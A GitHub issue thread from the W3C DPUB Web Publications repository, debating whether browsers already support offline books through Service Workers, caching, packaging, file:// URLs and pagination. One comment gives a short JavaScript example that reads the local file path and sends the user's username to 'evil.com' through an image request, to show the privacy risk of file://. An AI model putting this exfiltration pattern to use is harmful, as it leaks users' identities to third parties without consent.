w3c / dpub-pwp

Repository of the W3C DPUB IG on the (Packaged) Web Publications work
14 stars 12 forks source link

Spec doesn't justify its raison d'être #21

Closed marcoscaceres closed 8 years ago

marcoscaceres commented 8 years ago

A naive reading of the spec doesn't really give a true raison d'être for its existence. The spec is a little hand-wavy about required resources and fonts, etc. but it doesn't prove that current web technologies don't already do everything described.

What would be great would be more clarity about that. That is, a really clear, technical proof, that "today, the Web cannot do books: _why this spec is really needed here." It seems like DRM would be the only thing (?), as I'm having a hard time thinking of what can't be built today using Web tech with regards to "books" on the Web - and hypermedia in general, which the Web is pretty good at.

Let's frame this differently: let's say you came to Mozilla, Google, or Apple and asked them to implement the spec. What would you want the browser to do differently and why? And how would that be different to "web apps"?

As a web developer, I can already do offline with Service Workers, etc. The fonts issue can also be handled through the fonts API and through the cache API, fetching is handled by the fetch spec. And so on... and the merging of data is trivial too (e.g., Object.assing({}, JSON.parse(a), JSON.parse(b)))). so, it would be great to identify what the actual gaps are that the spec is trying to standardize.

It might be that the Web provides all of what is needed already? It be really cool to do a rundown and see what is missing.

marcoscaceres commented 8 years ago

Apologies if the above sounds negative - that's not intentional! As someone who works for a browser maker, I'm extremely interested in finding deficiencies in the web platform and fixing them!

mac2net commented 8 years ago

Hi Marco Fonts can be encoded and embedded right now. What "we" need from browsers is auto-decompression of something like ".pwp" which is a compressed HTML PWP file. Check out my working PWP Original: http://www.w3.org/2016/09/TPAC/ Online sample: http://samples.5doc.org/content/w3c-tpac-2016/ Click the red "5" to create on the fly a download and offline version including an embedded version of the font League Gothic. Cheers Mike

marcoscaceres commented 8 years ago

@mac2net, getting 404 on those links?

marcoscaceres commented 8 years ago

@mac2net, but there is a presupposition that you need a package of some sort (.pwp).

Why do you need the package at all? What's wrong with just serving content over HTTP + given all the good stuff in HTTP/2 (like pushing resources to the client, etc.) and all the compression and performance you get?

iherman commented 8 years ago

On 23 Jun 2016, at 12:00, Marcos Cáceres notifications@github.com wrote:

A naive reading of the spec doesn't really give a true raison d'être for its existence. The spec is a little hand-wavy about required resources and fonts, etc. but it doesn't prove that current web technologies don't already do everything described.

What would be great would be more clarity about that. That is, a really clear, technical proof, that "today, the Web cannot do books: _why this spec is really needed here." It seems like DRM would be the only thing (?), as I'm having a hard time thinking of what can't be built today using Web tech with regards to "books" on the Web - and hypermedia in general, which the Web is pretty good at.

Let's frame this differently: let's say you came to Mozilla, Google, or Apple and asked them to implement the spec. What would you want the browser to do differently and why? And how would that be different to "web apps"?

As a web developer, I can already do offline with Service Workers, etc. The fonts issue can also be handled through the fonts API and through the cache API, fetching is handled by the fetch spec. And so on... and the merging of data is trivial too (e.g., Object.assing({}, JSON.parse(a), JSON.parse(b)))). so, it would be great to identify what the actual gaps are that the spec is trying to standardize.

It might be that the Web provides all of what is needed already? It be really cool to do a rundown and see what is missing.

We fully agree with the criticism (which, reflecting to your other comment, I consider as a friendly one!). Earlier versions (eg, the official draft did include use cases but we decided that this is not the right place, and the main emphasis of the IG at this moment is to make a proper, separate UCR document (an early draft is in another repo. We hope to come up with a much more consistent version early autumn; this document is a bit on hold until then.

As for the other question: I am not sure there is something browsers should do differently. For the time being, I believe PWP will be implementable via a complex web app, just as there are EPUB3 readers available. In other words, it is meant to be a standard for specific types of resources on the Web that can be rendered, if so chosen, on top of current browsers. In other words, it may not be part of the Web Runtime. On a longer term, there may be some issues coming to the fore where efficiency would be increased if browser did something special, but that is for later.

Well, there is one thing to make this viable: the role of Service Workers is ssential, so we hope all browsers will have it, eventually. But, afaik, that is well on its way.

Thanks again for your interest!

mac2net commented 8 years ago

Sorry, my markdown fell down... Original Sample Click on the red "5" to download an offline version. Regarding your question: For online: nothing is wrong For offline: the 5DOC HTML format works fine, but compression would yield a smaller file than a PDF of the same web page and it looks a lot better.

marcoscaceres commented 8 years ago

Wanted to drop this here as an example of web app that is a book: https://hpbn.co/

mac2net commented 8 years ago

Thanks. I actually prepared something similar for offline. Didn't finish the ReadMe yet but the content works. I adopted the W3C SVG2 specs for offline use.

If you've seen the latest PWP drafts/meeting logs you will know the current thinking seems to be quite complex, for example the proposed manifest.

The 5DOC sample on Github shows my simple idea of a director file at the top level of a compressed container, called .pwpaccess.

I offered an example for the SVG2 specs container (similar to the HPBN book): {"mimetype": "application/pwp+zip", "index": "/SVG2/Overview.html", "index-type": "text/html"}

Other index-types could be developed as needed, but in the meantime just this would kick start the use of offline HTML.

I suggest the following browser logic:

  1. Is the PWP file actually a ZIP -> No: die, Yes:...
  2. If the PWP file contains just one HTML file, cache and open.
  3. If it contains a .pwpaccess file, process the file by index and index-type
TzviyaSiegman commented 8 years ago

Thank you @marcoscaceres

@mac2net, please remember that PWP is in use case stage. We have not defined a packaging mechanism or a manifest mechanism. Please don't draw conclusions about specifics such as whether zip is the functionality that we will use. There is no PWP draft, only use cases and a vision statement. There is no proposed manifest manifest at this point, just discussion.

mac2net commented 8 years ago

I'm suggesting for PWP - as there is widespread recognition that current web technologies are more than satisfactory - that development mirror the incremental and iterative Web approach rather than the all or nothing ePub approach.

marcoscaceres commented 8 years ago

@mac2net, to echo @TzviyaSiegman comments: it's too early to be presenting any alternatives. The current web model has not proven itself deficient. You seem to be presupposing a deficiency in the web platform, which needs to be proved beyond a reasonable doubt (i.e., it must demonstrably not satisfy some set of use cases, which to date, we are still trying to figure out what those are, if any).

I would expect to see a list like:

Here are detailed example of what I mean:

I would expect something similar, to prove deficiency in the platform.

mac2net commented 8 years ago

Thanks @marcoscaceres for the explanation. I will try to better understand this process.

Regarding point 1) - "it does not do X, and users demonstrably need X", I think that the existential necessity of the PWP effort is very strong evidence that this is indeed true according to the judgement of the W3C.

Portable Web Publications achieve full convergence between online and offline/portable document publishing: publishers and users won't need to choose one or the other, but can switch between them dynamically, at will.

I feel it's important to distinguish between what's achievable (0-3 years) and what's aspirational (3->?) and the level of human need and effort justifies a certain % of the focus on the achievable.

marcoscaceres commented 8 years ago

Regarding point 1) - "it does not do X, and users demonstrably need X", I think that the existential necessity of the PWP effort is very strong evidence that this is indeed true according to the judgement of the W3C.

Consider that I would have to go and pitch this to Mozilla or Google or Apple's web engineering team: they would, as I'm asking you, like to see hard proof that they Web can't do whatever you need it to do.

If I walked in and claimed "existential necessity" based on some random group's existence at some random standards body, I don't think I would get very far. The W3C spins up groups all the time - and most of those groups fail to produce anything of value (failing fast/hard is a good thing). Being part of the W3C doesn't automatically give a group credibility - that is, until they do by providing a convincing case! Mere existence doesn't serve as evidence of need - it may be just a lack of knowledge that the web can already do what needs to be done (which is the position I am arguing).

So, let me frame this differently: how are the use cases not solved with Service Workers, IDB, Cache API, etc.? The burden of proof, unfortunately, falls on you to prove that the Web "can't do books" - whatever that may mean.

mac2net commented 8 years ago

Thanks again @marcoscaceres. The background information about W3C processes is very helpful. I spent a few hours yesterday studying where responsibilities for the technical aspects lie. I also just reviewed the use cases.

5DOC is not using the same approach as PWP. One can read online or download and read offline via file:///localUrl. The Use Cases and Requirements document hasn't described the process for accessing an offline PWP yet.

From what I understand, the existing technologies are glorified caches, not permanent file system storage. Downloading and storing a PWP in iCloud and accessing from a variety of devices for later offline use, is not a use case. There is no disclosure of what the PWP offline protocol would be. Unless I missed something.

I have created many 5DOC samples that show this idea. This is the 5DOC representation of the PWP spec. Click the red "5" to download and read offline via file:///. The only difference is that I removed Respec.

marcoscaceres commented 8 years ago

I spent a few hours yesterday studying where responsibilities for the technical aspects lie. I also just reviewed the use cases.

That's great to hear.

read offline via file:///localUrl

There are serious limitations around using file://: namely, it's incompatible with the Web's same origin policy - so basically, fetching/xhr breaks, as do other security checks. It's not viable to use file://... it also has the potential leak privacy sensitive information: for example, if I was to save a file onto my HD, and open it, it would expose my username:

"/Users/marcos/Downloads/some.file"

An attacker could then simply take the window.location and get at my username and send it back to the server by:

var username = getUsername(window.location);
var image = new Image("http://evil.com/?user=" + username);
document.body.appendChild(image);

From what I understand, the existing technologies are glorified caches, not permanent file system storage.

You are correct. We are working on fixing that tho: https://storage.spec.whatwg.org/#dom-storagemanager-persist

This is the 5DOC representation

Thanks for the link. Before we do there tho, we need to work out if Persistent Storage (above) is insufficient.

As an aside: can I kindly ask that you not use the W3C Editor's draft style and W3C logo for unofficial documents? This can confuse people into thinking that the w3c membership has some level on consensus around the proposal. Please switch to "unofficial".

mac2net commented 8 years ago

Let me review your technical points, but regarding reproduction of the W3C page, I have read the W3C Document License and thought the 5DOC representation followed the guidelines. At the moment this document is unreleased as there is no incoming link from the 5DOC home page or anywhere else on the site and when it is released I always make it clear where the document is originated from and provide a link to it.

marcoscaceres commented 8 years ago

Ok, but please do consider changing to "unofficial". From experience, these documents have a habit of getting shared around (e.g., via email, twitter, etc.), and people don't read the status sections - so it can easily lead to confusion.

mac2net commented 8 years ago

Just to clarify, first I wanted to make sure I didn't misunderstand the W3C license, because I don't want to violate any rules/laws. I am happy to add some kind of distinguishing label so it is clear to the user. For a released 5DOC, the contents of the Modal explains this, but I will put something on the actual content page as well.

mac2net commented 8 years ago

Regarding file:///, I can't find any reference that it presents any additional risk over a conventional url. Or are you saying that the security policy could break the page if there is a "fetch/xhr"? Why would exposing my local path be any more dangerous than exposing for example my github path https://github.com/mac2net?

marcoscaceres commented 8 years ago

Regarding file:///, I can't find any reference that it presents any additional risk over a conventional url.

For instance: https://tools.ietf.org/html/draft-ietf-appsawg-file-scheme-11#section-5

In the example, I also showed how you could steal someone's username on Unix-based systems pretty trivially.

Or are you saying that the security policy could break the page if there is a "fetch/xhr"?

Correct. See "file": https://fetch.spec.whatwg.org/#basic-fetch

Why would exposing my local path be any more dangerous than exposing for example my github path https://github.com/mac2net?

Because the file system is supposed to be private (and information about it is not supposed to leak outwards) - using file:// circumvents this by exposing this information.

Let's say you wanted to target SysAdmins with book attack at company X - you might get them to d/l your book, and then ping back they username of those who open the book: this could be used to, for instance, black mail someone: "you opened the Pr0n book - we have proof and we are going to tell your boss" - this is different from going to a website anonymously, as you can't get direct proof of who the person is (unlike directly getting the person's username); so just trying to brute force the password, given that an attacker now has the username for a user's computer.

Re Github: is a public host. If you don't sign into github, you don't expose your username, for instance. Only an IP address.

mac2net commented 8 years ago

Having a browser's security policy break a fetch/xhr in what is supposed to be an offline doc is a good thing. Javascript triggered dynamic data sets is an edge case for offline docs.

Regarding the IETF doc, I already saw this document and I am reviewing it again. It is very vague and the linked documents are also vague.

With respect to the "same origin policy", don't default browser settings enforce this?

I searched Apple for this stuff and the only thing I found was that Safari requires one to manually disable protections. I also saw other browsers have similar restrictions.

Also, wouldn't any of the cache type storage techniques also present new and perhaps yet unidentified security risks?

marcoscaceres commented 8 years ago

On 14 Jul 2016, at 7:24 PM, Mike - 5DOC notifications@github.com wrote:

Having a browser's security policy break a fetch/xhr in what is supposed to be an offline doc is a good thing. Javascript triggered dynamic data sets is an edge case for offline docs.

That's not necessarily true. Again, see Service Workers. They are specifically designed to cover this case. Regarding the IETF doc, I already saw this document and I am reviewing it again. It is very vague and the linked documents are also vague.

Yes, no one wants to deal with file:// :) but in all seriousness, basing anything on file:// is a nonstarter from an implementer's perspective. With respect to the "same origin policy", don't default browser settings enforce this?

In as far as things break, then yes.

I searched Apple for this stuff and the only thing I found was that Safari requires one to manually disable protections. I also saw other browsers have similar restrictions.

Sure. Also, wouldn't any of the cache type storage techniques also present new and perhaps yet unidentified security risks?

Absolutely. But they are not inherent for interoperability: those would be things we would fix, not part of the design (unlike file:// which is broken by design). — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or mute the thread.

mac2net commented 8 years ago

I will keep researching this.

Regarding data sets, for 5DOC it's an edge case. I don't know enough to comment about it's applicability with Service Workers.

I do think - going back to your point that many W3C group initiatives fail - DIGIPUB-IG should consider this when basing PWP on as of yet unproven technologies.

File URLs may be considered the dodo bird of the browser - I live in the Netherlands which still has guilt feelings over the dodo's extinction - but html docs and html containers loaded this way work really well and typical browser settings are in place to protect against breaches.

Perhaps your concerns are a great argument in support of the pwp compressed file type which could include some kind of validation as a step in processing these documents.

marcoscaceres commented 8 years ago

Perhaps your concerns are a great argument in support of the pwp compressed file type which could include some kind of validation as a step in processing these documents.

We tried that with Firefox OS, for instance - and we tried it at the W3C and other consotia (Bondi, JIL, WAC, etc.). Others have tried the packaged web app thing too: they all failed spectacularly (remember, I wrote the original "Packaged Web Apps" spec [1] and made numerous attempts to solve the file:// issue [2][3] - and tried to solve the security problems [4] ). The bottom line is, "don't fight the Web". The web is really good at doing documents, and navigating documents. Where it is not, we should incrementally fix. Trying to come up with new security models to work around perceived limitations hasn't gotten up very far in the past.

[1] https://www.w3.org/TR/widgets/ [2] https://www.w3.org/TR/widgets-uri/ [3] https://www.w3.org/TR/app-uri/ [4] https://www.w3.org/TR/widgets-digsig/ [5] https://www.w3.org/TR/widgets-access/

mac2net commented 8 years ago

Thanks, I will review these too!

It took some very smart people over 40 years to make a successful vertical launch plane and it will be a full century before the F-35 goes mainstream.

Things are always changing. I remember thinking Apple's OpenDoc was great back in the early 90s. While it failed, its ancestors are in wide use today.

I am approaching this from the user's perspective. The screen reader is a failure in the way that a VW Beetle was a failure - very successful for a limited time when a limited vision of transport dominated.

SRs bifurcated the market through their limitations and incompatibilities. And while its popularity shows that there is a lot right about PDF, it is based on the physical page, not a web page.

IMO content originated in HTML - and HTML's % of the total pie is growing rapidly - should be consumed offline in the same way as online. So maybe it's time for another shot at it.

I remember after going into a DTP business back in '86 with the Apple LaserWriter Plus, so many folks would explain to me what was wrong with the technology and why it would never work.

I guess I enjoy working on the edge of technology rather than with the masses.

juicejuice commented 8 years ago

From the user perspective, absolutely there is a need for this. I would venture that the primary PDF use-case for a lot of people is to capture and store a copy of an information set at a point in time. This is then either printed or downloaded.

It's unclear to me how important a fully downloaded web app is, as opposed to just static content, but I definitely see the use case for static content. EPUB goes part of the way, but the fact you can't just "print to EPUB" from most environments, coupled with a general lack of out-of-the-box EPUB readers on various platforms, means its usage is not as widespread as it could (should?) be.

I think the popularity of web snippet tools gives a good pointer to how people would like to interact with offline web content and form their own content libraries.

mac2net commented 8 years ago

The reference documents are very helpful.

The bottom line is, "don't fight the Web". The web is really good at doing documents, and navigating documents.

5DOC is very document focused - it's in the name after all. I want it to be clear it is NOT an app. It is content.

Perhaps a laser focus on the offline document as just that would enable overcoming the obstacles encountered with these other initiatives.

juicejuice commented 8 years ago

Perhaps a laser focus on the offline document

+1

TzviyaSiegman commented 8 years ago

quote 5DOC is not using the same approach as PWP. <

@mac2net if 5DOC is not using the same approach as PWP, why is this being discussed here? As I've said numerous times, PWP is not yet a spec and does not outline an approach. It is a vision and an incomplete set of use cases. Please limit the discussion to issues about PWP. Please do not use this forum to advertise your services. @marcoscaceres has offered technical critique. Please continue along those lines.

mac2net commented 8 years ago

I am not advertising my services. If you think I have, please provide the relevant quote so that I can correct my statement or delete that part of my comment.

dauwhe commented 8 years ago

@marcoscaceres wrote:

Wanted to drop this here as an example of web app that is a book: https://hpbn.co/

This is a great example. I can think of several ways this doesn't meet my expectations for a book:

Some of the above issues could be addressed with different markup or more javascript. But what I see as the fundamental problem is that it's too much cognitive work to read long-form content like this. As a thought experiment, consider how many events would be sent to the browser while reading this entire book--there would likely be thousands of scroll events, in addition to all the link-clicking to get from chapter to chapter.

In a paginated ebook reader, a single UI gesture—a swipe or a click—would get me through the whole book, regardless of how the HTML is organized. This is reading without distraction, where I can focus on the content rather than the interface. This is what's different about books: I read, I turn the page, and that's all I need to do.

Note: Firefox can do something like this now without pagination, if there is rel=next; the spacebar will get you everywhere you need to go.

From the web perspective, that means three things to me:

  1. Some way of defining that a group of web resources are part of a single whole, and being able to talk about the whole. Having a list in a web app manifest would be a nice way of telling a service worker what to cache for offline reading.
  2. Being able to define a default ordering of web resources. nav can do this, or it's another easy thing to do in some sort of JSON manifest.
  3. Pagination. Three lines of CSS can do a nice job of this in desktop Safari (overflow: -webkit-paged-x plus scroll snapping). It's fun reading books in Presto. Again, this can be scripted, but I personally think this is such a useful UI paradigm that it should be baked into the browsers.
marcoscaceres commented 8 years ago

@dauwhe, this is exactly the kind of feedback I was looking for - real use cases + real limitations 💃. Thank you! Let me chew on that for a few days.

marcoscaceres commented 8 years ago

Quick note/thoughts... could not help myself 😄:

"The main page has no schema.org metadata."

Don't get hung up on existing solutions, there are many ways to deal with asserting "this is a book" and that the user agent should treat it as one (which is really what we want here: the browser should present this in a special way, that provides the UX/UI affordances that are typical of a good reading experience... would love to see a document like the NetInfo Use Cases showing various UIs from e-readers, etc. and how they solve these problems... distilling what makes the reading experience great on Kindle, for example).

  • Searching for something in the book would mean going to Google and doing term site:hpbn.co.

I like this! I wonder how we could do in page search using the Cache API or if we need a Search API for the cache, that searches parsed markup for full text.

I am unable to highlight a passage or make notes (at least until web annotations come along!)

Need to re-read that spec... but I wonder if that can't already be done, by implementing Web Annotations in JS.

My options to customize the reading experience are limited.

This is really related to 1. But I agree - everything you suggest here is awesome. If we could just say "book mode!" (like Reading mode in Safari, Opera, etc.) it would solve a lot of issues and just let the browser provide a great UI/UX for night mode, for setting the font, etc.

As a thought experiment, consider how many events would be sent to the browser while reading this entire book--there would likely be thousands of scroll events, in addition to all the link-clicking to get from chapter to chapter.

I find this quite subjective - and seems to take a romantic view of textual reading (I can imagine wonderfully interactive books or games). Literary experiences come in many forms, which may be dependent on all those events. Having said that, EvenListenerOptions mitigate some redundant events - at least for scrolling: https://github.com/WICG/EventListenerOptions

Some way of defining that a group of web resources are part of a single whole, and being able to talk about the whole. Having a list in a web app manifest would be a nice way of telling a service worker what to cache for offline reading.

Maybe manifest scope? https://w3c.github.io/manifest/#scope-member

Apologies for the lack of example there... but basically groups a set of URLs to say they are part of a whole.

Pagination. Three lines of CSS can do a nice job of this in desktop Safari (overflow: -webkit-paged-x plus scroll snapping). It's fun reading books in Presto. Again, this can be scripted, but I personally think this is such a useful UI paradigm that it should be baked into the browsers.

Certainly something worth exploring further.

marcoscaceres commented 8 years ago

Fixed quoted text above...

TzviyaSiegman commented 8 years ago

@marcoscaceres Thanks for feedback. DPUB is documenting use cases and reqs for PWP http://w3c.github.io/dpub-pwp-ucr/. This is very much a a work in progress at this point, but it should give you significantly more to chew on. @dauwhe's comments are spot on.

marcoscaceres commented 8 years ago

@TzviyaSiegman thanks for the link. Will have a read.

Anyway, this has been quite informative in helping me understand what is being proposed/discussed. Closing this for now.